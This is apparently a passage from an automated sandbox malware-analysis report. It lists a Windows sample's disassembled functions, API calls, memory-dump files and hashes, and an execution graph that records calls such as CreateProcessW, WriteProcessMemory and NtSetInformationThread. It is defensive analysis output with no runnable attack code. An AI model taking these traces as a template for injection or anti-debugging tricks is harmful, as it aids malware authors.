                                                                      • Opcode Fuzzy Hash: 1f27a7caf5751043fb0b86ac47cb3845d18c444dace418bfb70f9855d043ac52
                                                                      • Instruction Fuzzy Hash: D9E06574600702CFC361BF29E904786BBE9AB04744F44891DE886C6741FBB4E809CBB2
                                                                      Function 00D76C20 Relevance: 5.2, APIs: 4, Instructions: 183memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,40000022,862265DA,?,00000000,?,?,?,?,00DB9DA0,000000FF,?,00D76432,00000000,?), ref: 00D76CC4
                                                                      • LocalAlloc.KERNEL32(00000040,3FFFFFFF,862265DA,?,00000000,?,?,?,?,00DB9DA0,000000FF,?,00D76432,00000000,?), ref: 00D76CE7
                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,00DB9DA0,000000FF,?,00D76432,00000000), ref: 00D76D87
                                                                      • LocalFree.KERNEL32(?,862265DA,00000000,00DB93B0,000000FF,?,00000000,00000000,00DB9DA0,000000FF,862265DA), ref: 00D76E0D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 2012307162-0
                                                                      • Opcode ID: a6d862bde760b08dbdfb8e557e227eb0831cd16d63ed7b5619e1060d280e767d
                                                                      • Instruction ID: 509f302dd142811e9d44118086b17522ee881c8f995cdfb45a38cee59e1ae461
                                                                      • Opcode Fuzzy Hash: a6d862bde760b08dbdfb8e557e227eb0831cd16d63ed7b5619e1060d280e767d
                                                                      • Instruction Fuzzy Hash: E1517675A106059FDB18DF68C985AAEBBB5FB48350F14822DE819E7380E731ED10CBA4
                                                                      Function 00D74A80 Relevance: 5.2, APIs: 4, Instructions: 169memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LocalAlloc.KERNEL32(00000040,80000022,?,?,?,00000000,?,00000000,?,?), ref: 00D74B05
                                                                      • LocalAlloc.KERNEL32(00000040,7FFFFFFF,?,?,?,00000000,?,00000000,?,?), ref: 00D74B25
                                                                      • LocalFree.KERNEL32(7FFFFFFE,?,?,00000000,?,00000000,?,?), ref: 00D74BAB
                                                                      • LocalFree.KERNEL32(00000000,862265DA,00000000,00000000,Function_000492C0,000000FF,?,?,00000000,?,00000000,?,?), ref: 00D74C2D
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Local$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 2012307162-0
                                                                      • Opcode ID: 00228d4a3f9bb1f1586903a11662ddd2612d6bf0d76ca4e4f41c0c689f4e47e7
                                                                      • Instruction ID: 6ac467dcf06480e0266a26173f5c18754e37818b9907af237573b44aa3fcda9f
                                                                      • Opcode Fuzzy Hash: 00228d4a3f9bb1f1586903a11662ddd2612d6bf0d76ca4e4f41c0c689f4e47e7
                                                                      • Instruction Fuzzy Hash: 4851C4726042159FC7159F28D841A6AB7E9EF89350F144A6EF45AD7390EB30DD048BB1

                                                                      Execution Graph

                                                                      Execution Coverage:1.5%
                                                                      Dynamic/Decrypted Code Coverage:1.1%
                                                                      Signature Coverage:1.1%
                                                                      Total number of Nodes:272
                                                                      Total number of Limit Nodes:26
                                                                      execution_graph 79090 b1a110 79091 b1a230 79090->79091 79093 b1a13e 79090->79093 79093->79091 79094 b1a304 79093->79094 79095 b1a32c 79094->79095 79098 b1a26c 79095->79098 79097 b1a337 79097->79091 79101 b199a4 79098->79101 79100 b1a28f 79100->79097 79102 b199aa 79101->79102 79105 b15af0 79102->79105 79104 b199bf 79104->79100 79106 b15afa 79105->79106 79109 b0cae4 79106->79109 79108 b15b10 79108->79104 79110 b0caf5 79109->79110 79112 b0cb79 79110->79112 79113 bad3ec 79110->79113 79112->79108 79116 bad1a8 79113->79116 79115 bad3f9 79115->79112 79117 bad323 79116->79117 79118 bad1d8 79116->79118 79117->79115 79118->79117 79119 bad260 RegOpenKeyExW 79118->79119 79119->79118 79120 bad273 79119->79120 79120->79115 79248 bc0c48 79249 bc0c50 79248->79249 79259 bc0cdb 79249->79259 79274 bc0b40 79249->79274 79252 bc0b40 CreateProcessW 79253 bc0c90 79252->79253 79254 bc0b40 CreateProcessW 79253->79254 79255 bc0c9c 79254->79255 79256 bc0b40 CreateProcessW 79255->79256 79257 bc0ca8 79256->79257 79258 bc0b40 CreateProcessW 79257->79258 79262 bc0cb4 79258->79262 79260 bb0354 2 API calls 79259->79260 79261 bc0d25 79259->79261 79270 bc0e9b 79259->79270 79260->79261 79264 bb0354 2 API calls 79261->79264 79265 bc0d6f 79261->79265 79278 bb0354 79262->79278 79264->79265 79266 bb0354 2 API calls 79265->79266 79271 bc0db9 79265->79271 79266->79271 79267 bc0b40 CreateProcessW 79268 bc0e81 79267->79268 79269 bb0354 2 API calls 79268->79269 79269->79270 79272 bb0354 2 API calls 79271->79272 79273 bc0e45 79271->79273 79272->79273 79273->79267 79273->79270 79275 bc0b5c 79274->79275 79276 bc0bd5 CreateProcessW 79275->79276 79277 bc0be1 79276->79277 79277->79252 79279 bb036e 79278->79279 79282 ba544c 79279->79282 79280 bb03cd 79280->79259 79283 ba5460 79282->79283 79289 ba4a24 79283->79289 79285 ba558f 79285->79280 79286 ba5486 79286->79285 79293 99e834 79286->79293 79287 ba5517 79287->79280 79290 ba4a2d 79289->79290 79291 b0cae4 RegOpenKeyExW 79290->79291 79292 ba4a43 79291->79292 79292->79286 79294 99e84a 79293->79294 79297 99e7a8 79294->79297 79296 99e89a 79296->79287 79298 99e7c9 79297->79298 79302 99e80c 79297->79302 79299 99e7a8 KiUserCallbackDispatcher 79298->79299 79298->79302 79300 99e7e1 79299->79300 79303 99d0a0 79300->79303 79302->79296 79305 99d0b1 79303->79305 79304 99d11d 79304->79302 79305->79304 79308 9a54a4 79305->79308 79309 9a54c0 79308->79309 79312 9aad64 79309->79312 79311 99d0fc 79311->79302 79313 9aad9d 79312->79313 79316 b094b0 79313->79316 79314 9aaf5c 79314->79311 79317 b094ca KiUserCallbackDispatcher 79316->79317 79317->79314 79318 b5cee0 79319 b5cee9 79318->79319 79321 b5cef5 79318->79321 79322 b58164 79319->79322 79323 b5816e 79322->79323 79324 b581e4 79323->79324 79326 91af3c 79323->79326 79324->79321 79327 91af69 GetFileVersionInfoSizeW 79326->79327 79329 91af89 GetFileVersionInfoW 79327->79329 79330 91affc 79327->79330 79332 91afbc 79329->79332 79330->79324 79332->79324 79333 bf9748 79335 bf99fe 79333->79335 79336 bf9a22 79335->79336 79338 bf9a24 std::bad_alloc::bad_alloc 79335->79338 79343 bfc0b6 79335->79343 79353 bfc18f TlsGetValue TlsGetValue _raise 79335->79353 79341 bf9a4a 79338->79341 79354 bfc050 9 API calls __cinit 79338->79354 79355 bf99e1 7 API calls std::exception::exception 79341->79355 79342 bf9a54 FindHandler 79344 bfc169 79343->79344 79348 bfc0c8 _malloc 79343->79348 79360 bfc18f TlsGetValue TlsGetValue _raise 79344->79360 79346 bfc155 _raise 79346->79335 79348->79346 79351 bfc125 RtlAllocateHeap 79348->79351 79356 c0029d 4 API calls 2 library calls 79348->79356 79357 c000f2 4 API calls 6 library calls 79348->79357 79358 bfc067 7 API calls 3 library calls 79348->79358 79359 bfc18f TlsGetValue TlsGetValue _raise 79348->79359 79351->79348 79353->79335 79354->79341 79355->79342 79356->79348 79357->79348 79358->79348 79359->79348 79360->79346 79121 bca114 79122 bca127 79121->79122 79124 bca1b2 79121->79124 79123 bca1a8 GetNativeSystemInfo 79122->79123 79122->79124 79123->79124 79125 b0f118 79128 ba6710 79125->79128 79126 b0f147 79129 ba672a 79128->79129 79133 ba672f 79128->79133 79131 ba6801 79129->79131 79129->79133 79132 b0f53c 3 API calls 79131->79132 79134 ba6827 79132->79134 79133->79134 79135 b0f53c 79133->79135 79134->79126 79141 b0f556 79135->79141 79136 b0f5b0 79137 b0f5d9 79136->79137 79142 b0f5b5 79136->79142 79138 b0f72e 79137->79138 79149 b0f5bb 79137->79149 79140 b0acc0 3 API calls 79138->79140 79139 b0f5f5 79145 b0fa7b 79139->79145 79139->79149 79154 b5d288 GetFileVersionInfoSizeW GetFileVersionInfoW 79139->79154 79148 b0f739 79140->79148 79141->79136 79141->79139 79141->79148 79146 b0f9ec 79142->79146 79142->79149 79145->79134 79147 b0acc0 3 API calls 79146->79147 79146->79148 79147->79148 79148->79134 79149->79148 79150 b0acc0 79149->79150 79151 b0acd6 79150->79151 79152 b0aedb 79151->79152 79155 ba9c2c 79151->79155 79152->79148 79154->79149 79156 ba9c3b 79155->79156 79159 ba7b98 79156->79159 79158 ba9c4c 79158->79152 79160 ba7bbc 79159->79160 79161 ba7d31 79160->79161 79163 ba7c7d 79160->79163 79162 ba7d45 KiUserCallbackDispatcher 79161->79162 79165 ba7cca 79161->79165 79162->79165 79163->79165 79166 b5d2a4 GetFileVersionInfoSizeW GetFileVersionInfoW 79163->79166 79165->79158 79166->79165 79361 bfaa66 79362 bfaa71 __DllMainCRTStartup@12 79361->79362 79365 bfa970 79362->79365 79364 bfaa84 79366 bfa97c _raise 79365->79366 79369 bfa9c9 79366->79369 79371 bfaa19 _raise 79366->79371 79373 bfa83b 79366->79373 79368 bfa9f9 79370 bfa83b ___DllMainCRTStartup 28 API calls 79368->79370 79368->79371 79369->79368 79369->79371 79372 bfa83b ___DllMainCRTStartup 28 API calls 79369->79372 79370->79371 79371->79364 79372->79368 79374 bfa84a 79373->79374 79375 bfa8c6 79373->79375 79418 bfe1b4 HeapCreate 79374->79418 79377 bfa8fd 79375->79377 79378 bfa8cc 79375->79378 79379 bfa95b 79377->79379 79380 bfa902 79377->79380 79383 bfa8e7 79378->79383 79408 bfa855 79378->79408 79429 bfd9ff 7 API calls _doexit 79378->79429 79379->79408 79438 bfb92f 10 API calls 2 library calls 79379->79438 79433 bfb615 TlsGetValue TlsGetValue TlsGetValue TlsSetValue _raise 79380->79433 79383->79408 79430 bfdcb0 7 API calls _realloc 79383->79430 79384 bfa907 79434 bfd6af 8 API calls __calloc_impl 79384->79434 79390 bfa913 79390->79408 79435 bfb59a TlsGetValue TlsGetValue __init_pointers 79390->79435 79391 bfa865 79421 bfe1e4 HeapFree HeapFree 79391->79421 79392 bfa8f1 79431 bfb649 8 API calls 2 library calls 79392->79431 79396 bfa861 __RTC_Initialize 79396->79391 79422 bfe031 7 API calls 2 library calls 79396->79422 79397 bfa8f6 79432 bfe1e4 HeapFree HeapFree 79397->79432 79399 bfa931 79402 bfa94f 79399->79402 79403 bfa938 79399->79403 79401 bfa881 79423 bfda5c 8 API calls 3 library calls 79401->79423 79437 bfaa89 7 API calls _raise 79402->79437 79436 bfb686 7 API calls 2 library calls 79403->79436 79407 bfa88b 79409 bfa88f 79407->79409 79425 bfdf76 16 API calls ___initmbctable 79407->79425 79408->79369 79424 bfb649 8 API calls 2 library calls 79409->79424 79412 bfa89b 79413 bfa8af 79412->79413 79426 bfdcfe 16 API calls 6 library calls 79412->79426 79413->79408 79428 bfdcb0 7 API calls _realloc 79413->79428 79416 bfa8a4 79416->79413 79427 bfd838 9 API calls 5 library calls 79416->79427 79419 bfa850 79418->79419 79419->79408 79420 bfb99d 10 API calls 5 library calls 79419->79420 79420->79396 79421->79408 79422->79401 79423->79407 79424->79391 79425->79412 79426->79416 79427->79413 79428->79409 79429->79383 79430->79392 79431->79397 79432->79408 79433->79384 79434->79390 79435->79399 79437->79408 79438->79408 79167 8fdc44 79169 8fdc4c 79167->79169 79168 8fdc88 79169->79168 79171 8fc184 79169->79171 79173 8fc193 79171->79173 79174 8fc1a9 79171->79174 79173->79174 79175 8fc13c 79173->79175 79174->79168 79176 8fc14c 79175->79176 79177 8fc168 79175->79177 79179 8fd3b4 79176->79179 79177->79174 79180 8fd3f5 79179->79180 79183 8fd290 79180->79183 79182 8fd42e 79182->79177 79185 8fd2b1 79183->79185 79184 8fd32c 79184->79182 79185->79184 79189 8fc97c 79185->79189 79187 8fd348 79187->79184 79188 8fc97c 6 API calls 79187->79188 79188->79184 79191 8fc99f 79189->79191 79190 8fc9a8 79190->79187 79191->79190 79193 8fc860 6 API calls 79191->79193 79193->79190 79194 8fee44 79195 8fee4f 79194->79195 79198 8f9498 79195->79198 79199 8f94a7 79198->79199 79202 8f97dc 79199->79202 79203 8f942c 79199->79203 79204 8f9474 79203->79204 79205 8f943c 79203->79205 79205->79204 79207 bcb794 79205->79207 79208 bcb7ae 79207->79208 79209 bcb7c1 79207->79209 79211 b192fc 79208->79211 79209->79205 79212 b19322 GlobalAddAtomW 79211->79212 79214 b19370 79212->79214 79221 b19070 79214->79221 79216 b193d1 79226 bacb1c 79216->79226 79218 b193f0 79232 bae394 79218->79232 79220 b19410 79220->79209 79222 b190d0 79221->79222 79223 b1907f SetErrorMode 79221->79223 79222->79216 79224 b190a3 79223->79224 79225 b190b2 SetErrorMode 79223->79225 79224->79225 79225->79216 79227 bacb26 79226->79227 79236 bacffc 79227->79236 79229 bacb5f 79240 bad5d8 79229->79240 79231 bacc47 79231->79218 79233 bae3a3 79232->79233 79234 bae4a7 LoadIconW 79233->79234 79235 bae4ca 79234->79235 79235->79220 79237 bad00e 79236->79237 79238 bad032 LoadCursorW 79237->79238 79239 bad04f 79237->79239 79238->79237 79239->79229 79241 bad5f2 79240->79241 79242 bad66c SystemParametersInfoW 79241->79242 79243 bad68a 79242->79243 79243->79231 79439 1dba7c0 79440 1dba895 NtSetInformationThread 79439->79440 79441 1b3e928 NtQuerySystemInformation 79244 beb7b0 79245 beb7db 79244->79245 79246 beb805 79244->79246 79245->79246 79247 beb7e2 WriteProcessMemory 79245->79247

                                                                      Executed Functions

                                                                      Function 01DBA7C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 142nativethreadCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 390 1dba7c0-1dba947 NtSetInformationThread
                                                                      APIs
                                                                      • NtSetInformationThread.NTDLL ref: 01DBA899
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2581599388.0000000001DBA000.00000020.00000001.01000000.00000007.sdmp, Offset: 01DBA000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_1dba000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: InformationThread
                                                                      • String ID: e
                                                                      • API String ID: 4046476035-4024072794
                                                                      • Opcode ID: e75d78890c758655ed10d432cdabdfd8fe236bd656487057f6c459c77efb4086
                                                                      • Instruction ID: 1c7e36c046886324a019c581e8f0908421e97bc1221d4aca2d1b8756a26412b3
                                                                      • Opcode Fuzzy Hash: e75d78890c758655ed10d432cdabdfd8fe236bd656487057f6c459c77efb4086
                                                                      • Instruction Fuzzy Hash: 22410B3251865A0BC31DEE28EC440E6B3C6F6C8329B58873DE9DBC3686E33490578BC1
                                                                      Function 01B3E928 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtQuerySystemInformation.NTDLL ref: 01B3E92C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2581599388.0000000001B3C000.00000020.00000001.01000000.00000007.sdmp, Offset: 01B3C000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_1b3c000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: InformationQuerySystem
                                                                      • String ID:
                                                                      • API String ID: 3562636166-0
                                                                      • Opcode ID: 1f3a8111c5d2d5b92133da034e7bb3420c2438cf33a869b2a462d3ffe8cf3b79
                                                                      • Instruction ID: e1747c2b93f761410ad8b9a48995a26d96c05f38b170a4cfc08710a0117596dd
                                                                      • Opcode Fuzzy Hash: 1f3a8111c5d2d5b92133da034e7bb3420c2438cf33a869b2a462d3ffe8cf3b79
                                                                      • Instruction Fuzzy Hash: 2ED05E76608224DFC704DE9DB4C04C9B3B1AB88350B604426E965DB224D7306E6A8780
                                                                      Function 008FDCF8 Relevance: .0, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.00000000008F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 008F1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_8f1000_windows10.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab534339ebf2f26df59a6dabcf4891875b70cb508f85659e8086122488c55be5
                                                                      • Instruction ID: 8a478df58015df144de217e6e04deac4fc5e852b6df831b2e240d76c361782ad
                                                                      • Opcode Fuzzy Hash: ab534339ebf2f26df59a6dabcf4891875b70cb508f85659e8086122488c55be5
                                                                      • Instruction Fuzzy Hash: A5A01210408C000AC404A72C4C4380F35807D81210FC40214B55CE5682EA06856803D7
                                                                      Function 00B192FC Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 112COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GlobalAddAtomW.KERNEL32(00000000), ref: 00B19350
                                                                        • Part of subcall function 00B19070: SetErrorMode.KERNELBASE(00008000), ref: 00B19084
                                                                        • Part of subcall function 00B19070: SetErrorMode.KERNELBASE(?,00B190D0), ref: 00B190C3
                                                                        • Part of subcall function 00BAE394: LoadIconW.USER32(00BD4040,MAINICON,?,?,?,00B19410), ref: 00BAE4BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AtomGlobalIconLoad
                                                                      • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$DelphiRM_GetObjectInstance$USER32
                                                                      • API String ID: 1953398334-1139167764
                                                                      • Opcode ID: 1c95ce4c36e97c6fcfdb48dcd49fe51db96fc80a9add1da6eed97a1b8032b9d3
                                                                      • Instruction ID: eb676cbad24aaa0b91f0ea24cc2153ef68e0799743882eefd44177d352ddbfe0
                                                                      • Opcode Fuzzy Hash: 1c95ce4c36e97c6fcfdb48dcd49fe51db96fc80a9add1da6eed97a1b8032b9d3
                                                                      • Instruction Fuzzy Hash: 0B4171746102459FCB00EFB8ECA2A9DB7E8FB55300B404475F514D73A2EF349A44CB61
                                                                      Function 00BFA83B Relevance: 9.1, APIs: 6, Instructions: 105COMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 147 bfa83b-bfa848 148 bfa84a-bfa84b call bfe1b4 147->148 149 bfa8c6-bfa8ca 147->149 155 bfa850-bfa853 148->155 151 bfa8fd-bfa900 149->151 152 bfa8cc-bfa8d2 149->152 153 bfa95b-bfa95e 151->153 154 bfa902-bfa919 call bfb615 call bfd6af 151->154 156 bfa855-bfa857 152->156 157 bfa8d4-bfa8e0 152->157 160 bfa967-bfa969 153->160 161 bfa960-bfa966 call bfb92f 153->161 154->156 178 bfa91f-bfa936 call bfb59a 154->178 155->156 159 bfa85c-bfa863 call bfb99d 155->159 162 bfa96a-bfa96d 156->162 163 bfa8e7-bfa8ea 157->163 164 bfa8e2 call bfd9ff 157->164 175 bfa86c-bfa88d call bfe168 call bfe031 call bfda5c 159->175 176 bfa865-bfa86a call bfe1e4 159->176 160->162 161->160 163->160 169 bfa8ec-bfa8fb call bfdcb0 call bfb649 call bfe1e4 163->169 164->163 169->160 201 bfa88f-bfa894 call bfb649 175->201 202 bfa896-bfa89d call bfdf76 175->202 176->156 193 bfa94f-bfa956 call bfaa89 178->193 194 bfa938-bfa94d call bfb686 178->194 193->156 194->160 201->176 208 bfa8bf-bfa8c4 call bfdcb0 202->208 209 bfa89f-bfa8a6 call bfdcfe 202->209 208->201 209->208 214 bfa8a8-bfa8b2 call bfd838 209->214 214->208 217 bfa8b4-bfa8ba 214->217 217->160
                                                                      APIs
                                                                      • __mtterm.LIBCMT ref: 00BFA8F1
                                                                        • Part of subcall function 00BFE1B4: HeapCreate.KERNELBASE(00000000,00000000,00001000,00000000,?,00BFA850,?), ref: 00BFE1CA
                                                                      • __RTC_Initialize.LIBCMT ref: 00BFA86C
                                                                      • __mtterm.LIBCMT ref: 00BFA88F
                                                                        • Part of subcall function 00BFB649: TlsFree.KERNEL32(00C0C65C,00BFA8F6), ref: 00BFB674
                                                                      • __setenvp.LIBCMT ref: 00BFA89F
                                                                      • __cinit.LIBCMT ref: 00BFA8AA
                                                                      • __freeptd.LIBCMT ref: 00BFA961
                                                                        • Part of subcall function 00BFB615: TlsGetValue.KERNEL32(?,00BFB784), ref: 00BFB61E
                                                                        • Part of subcall function 00BFB615: TlsSetValue.KERNEL32(00000000), ref: 00BFB63F
                                                                        • Part of subcall function 00BFD6AF: __calloc_impl.LIBCMT ref: 00BFD6C0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Value__mtterm$CreateFreeHeapInitialize__calloc_impl__cinit__freeptd__setenvp
                                                                      • String ID:
                                                                      • API String ID: 1549949408-0
                                                                      • Opcode ID: fb9780ff681dc9f49ff86cfa4d65104bd820c53908668b574e8b6565fc10da02
                                                                      • Instruction ID: 884df2f9f6199fd1e90c80bf4ce280ef250f5749e889fec4d8c0049579634dd8
                                                                      • Opcode Fuzzy Hash: fb9780ff681dc9f49ff86cfa4d65104bd820c53908668b574e8b6565fc10da02
                                                                      • Instruction Fuzzy Hash: 5E21C3B150424D999A2D37B19C4273E33D9DE507A0B2185FAFB1CD3092EFA0C84E9563
                                                                      Function 00BF9748 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 218 bf9748-bf9a06 220 bf9a15-bf9a18 call bfc0b6 218->220 222 bf9a1d-bf9a20 220->222 223 bf9a08-bf9a13 call bfc18f 222->223 224 bf9a22-bf9a23 222->224 223->220 227 bf9a24-bf9a30 223->227 228 bf9a4b-bf9a6f call bf99e1 call bfc1b7 227->228 229 bf9a32-bf9a4a call bf9994 call bfc050 227->229 238 bf9a78-bf9a7e 228->238 229->228 239 bf9a71-bf9a74 238->239 240 bf9a80-bf9a83 238->240 241 bf9a87-bf9a88 239->241 242 bf9a76-bf9a77 239->242 240->241 243 bf9a85 240->243 242->238 243->241
                                                                      APIs
                                                                      • _malloc.LIBCMT ref: 00BF9A18
                                                                        • Part of subcall function 00BFC0B6: __FF_MSGBANNER.LIBCMT ref: 00BFC0D9
                                                                        • Part of subcall function 00BFC0B6: __NMSG_WRITE.LIBCMT ref: 00BFC0E0
                                                                        • Part of subcall function 00BFC0B6: RtlAllocateHeap.NTDLL(00000000,?,00000001), ref: 00BFC12D
                                                                      • std::bad_alloc::bad_alloc.LIBCMT ref: 00BF9A3B
                                                                        • Part of subcall function 00BF9994: std::exception::exception.LIBCMT ref: 00BF99A0
                                                                      • std::bad_exception::bad_exception.LIBCMT ref: 00BF9A4F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2542436823.0000000000BF9000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BF9000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_bf9000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                      • String ID: PU'
                                                                      • API String ID: 832318072-4254717615
                                                                      • Opcode ID: d8754849175cb0c8c04bd20d674257c9db1b8b7398be57d02fddf9b9a0aa5d64
                                                                      • Instruction ID: 3648112d81437b8c644b9c83ee2dc51648abf5ca7bd2a91fbe63d0fa4b4afe67
                                                                      • Opcode Fuzzy Hash: d8754849175cb0c8c04bd20d674257c9db1b8b7398be57d02fddf9b9a0aa5d64
                                                                      • Instruction Fuzzy Hash: 22014C3140420D6ACF34B765D802BBE3BD8CB80728B1480F5FA05975E2DE71DD8EC691
                                                                      Function 00BAD1A8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125registryCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 244 bad1a8-bad1d2 245 bad1d8-bad206 244->245 246 bad334-bad352 244->246 251 bad20c-bad216 245->251 252 bad323-bad32d 245->252 253 bad219-bad225 call b19244 251->253 252->246 256 bad22b-bad26d RegOpenKeyExW 253->256 257 bad316-bad31d 253->257 256->257 259 bad273-bad2a7 256->259 257->252 257->253 261 bad2f8-bad30e 259->261 262 bad2a9-bad2e0 259->262 262->261 266 bad2e2-bad2ee 262->266 266->261
                                                                      APIs
                                                                      • RegOpenKeyExW.KERNELBASE(80000002,00000000), ref: 00BAD266
                                                                      Strings
                                                                      • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 00BAD250
                                                                      • layout text, xrefs: 00BAD297
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: Open
                                                                      • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                      • API String ID: 71445658-2652665750
                                                                      • Opcode ID: 1e904e6baa49bde0ca5e0c38124d7ac03643cc4edf114ff24013146a2408addd
                                                                      • Instruction ID: 49f2b7b088fac2598c3a4c1a948244a5982aef24147e978703b2f46d72a5fa7d
                                                                      • Opcode Fuzzy Hash: 1e904e6baa49bde0ca5e0c38124d7ac03643cc4edf114ff24013146a2408addd
                                                                      • Instruction Fuzzy Hash: 73412874A04208AFDB11DF98C982BADB7F9FB4A300F5040E5EA05E7651E770AF44CB66
                                                                      Function 00B19070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 267 b19070-b1907d 268 b190d0-b190d2 267->268 269 b1907f-b190a1 SetErrorMode 267->269 270 b190a3-b190ad 269->270 271 b190b2-b190c8 SetErrorMode 269->271 270->271
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008000), ref: 00B19084
                                                                      • SetErrorMode.KERNELBASE(?,00B190D0), ref: 00B190C3
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000E.00000002.2500868091.0000000000ACD000.00000020.00000001.01000000.00000007.sdmp, Offset: 00ACD000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_14_2_acd000_windows10.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID: imm32.dll
                                                                      • API String ID: 2340568224-1815517138
                                                                      • Opcode ID: f8df4e2d89f544a77f160caf0bb080919012a3fb0f62eea1a2ae0f2a74ade47c
                                                                      • Instruction ID: 816a1f0bcc38b5fe124907dc713d354a62ea22c1b5ef718e55cc8bac2181f8fc
                                                                      • Opcode Fuzzy Hash: f8df4e2d89f544a77f160caf0bb080919012a3fb0f62eea1a2ae0f2a74ade47c
                                                                      • Instruction Fuzzy Hash: F3F0E271608744AFD711DB68AC36B65B7ECD348B10FD2C4E6F008D39E0EA759980CA20
                                                                      Function 00BAE394 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 150windowCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
